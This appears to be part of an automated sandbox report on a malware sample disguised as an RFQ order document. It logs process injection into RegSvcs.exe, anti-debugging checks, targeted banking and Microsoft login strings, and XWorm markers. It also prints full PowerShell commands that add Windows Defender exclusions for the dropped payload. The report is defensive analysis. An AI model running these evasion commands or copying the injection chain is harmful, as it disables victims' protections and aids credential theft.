Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: XClient.exe, 00000007.00000002.2513650062.000000001BD70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3u
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK/Q7
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: wscript.exe, 00000012.00000002.1361335987.000001EA9B656000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P(W
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHE
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: build.exe, 00000006.00000002.1709366618.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\build.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00473F09 BlockInput, 0_2_00473F09
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00435A7C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0057F594 mov eax, dword ptr fs:[00000030h] 0_2_0057F594
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00BB87A8 mov eax, dword ptr fs:[00000030h] 0_2_00BB87A8
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00BB9E18 mov eax, dword ptr fs:[00000030h] 0_2_00BB9E18
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00BB9E78 mov eax, dword ptr fs:[00000030h] 0_2_00BB9E78
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02F81130 mov eax, dword ptr fs:[00000030h] 0_2_02F81130
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FC3F3D mov eax, dword ptr fs:[00000030h] 0_2_02FC3F3D
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_00A4DB28 mov eax, dword ptr fs:[00000030h] 4_2_00A4DB28
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_00A4C4B8 mov eax, dword ptr fs:[00000030h] 4_2_00A4C4B8
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_00A4DB88 mov eax, dword ptr fs:[00000030h] 4_2_00A4DB88
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_01281130 mov eax, dword ptr fs:[00000030h] 4_2_01281130
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012C3F3D mov eax, dword ptr fs:[00000030h] 4_2_012C3F3D
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B11130 mov eax, dword ptr fs:[00000030h] 20_2_00B11130
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B53F3D mov eax, dword ptr fs:[00000030h] 20_2_00B53F3D
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00C09570 mov eax, dword ptr fs:[00000030h] 20_2_00C09570
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00C09510 mov eax, dword ptr fs:[00000030h] 20_2_00C09510
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00C07EA0 mov eax, dword ptr fs:[00000030h] 20_2_00C07EA0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_004580A9
Source: C:\Users\user\AppData\Local\Temp\build.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A155
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042A124 SetUnhandledExceptionFilter, 0_2_0042A124
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02FC1361
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_02FC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_02FC4C7B
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012C1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_012C1361
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 4_2_012C4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_012C4C7B
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B51361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00B51361
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Code function: 20_2_00B54C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_00B54C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe NtOpenKeyEx: Indirect: 0x140077B9B
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe NtQueryValueKey: Indirect: 0x140077C9F
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe NtClose: Indirect: 0x140077E81
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A81008
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438008
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004587B1 LogonUserW, 0_2_004587B1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004048D7
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00464C53 mouse_event, 0_2_00464C53
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\antholite\exhilaratingly.exe"
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00457CAF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0045874B
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1231041983.00000000041D3000.00000004.00001000.00020000.00000000.sdmp, RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233074817.00000000004B4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Binary or memory string: Shell_TrayWnd
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager2=
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: XClient.exe, 00000007.00000002.2500110094.0000000002F56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0042862B cpuid 0_2_0042862B
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Queries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
